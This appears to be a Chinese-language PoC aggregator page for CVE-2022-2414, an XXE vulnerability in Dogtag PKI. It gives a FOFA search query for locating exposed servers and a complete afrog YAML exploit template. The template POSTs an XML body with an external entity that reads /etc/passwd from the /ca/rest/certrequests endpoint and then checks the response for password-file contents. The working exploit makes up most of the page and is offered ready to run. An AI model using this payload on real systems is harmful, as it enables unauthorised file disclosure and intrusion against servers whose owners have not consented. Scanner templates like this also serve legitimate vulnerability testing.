CVE-2022-2414: Dogtag PKI XML实体注入漏洞 CVE-2022-2414

日期: 2025-09-01 | 影响软件: Dogtag PKI | POC: 已公开

漏洞描述

Dogtag PKI 的XML解析器存在安全漏洞，该漏洞源于在分析 XML 文档时访问外部实体可能会导致 XML 外部实体（XXE）攻击。此漏洞允许远程攻击者通过发送特制的 HTTP 请求来潜在地检索任意文件的内容。 fofa-query: title="Identity Management"

PoC代码[已公开]

id: CVE-2022-2414

info:
  name: Dogtag PKI XML实体注入漏洞 CVE-2022-2414
  author: daffainfo
  severity: critical
  description: |
    Dogtag PKI 的XML解析器存在安全漏洞，该漏洞源于在分析 XML 文档时访问外部实体可能会导致 XML 外部实体 （XXE） 攻击。此漏洞允许远程攻击者通过发送特制的 HTTP 请求来潜在地检索任意文件的内容。
    fofa-query: title="Identity Management"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md

rules:
  r0:
    request:
      method: POST
      path: /ca/rest/certrequests
      headers:
        Content-Type: application/xml
      body: |
        <!--?xml version="1.0" ?-->
        <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
        <CertEnrollmentRequest>
          <Attributes/>
          <ProfileID>&ent;</ProfileID>
        </CertEnrollmentRequest>
    expression: response.status == 400 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-2414.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Dogtag PKI XML实体注入漏洞 无POC

Dogtag PKI XML实体注入漏洞(CVE-2022-2414) 无POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

CVE-2022-0342: Zyxel authentication bypass patch analysis POC

CVE-2022-0434: WordPress Page Views Count <2.4.15 - SQL Injection POC

Dogtag PKI XML实体注入漏洞无POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446）无POC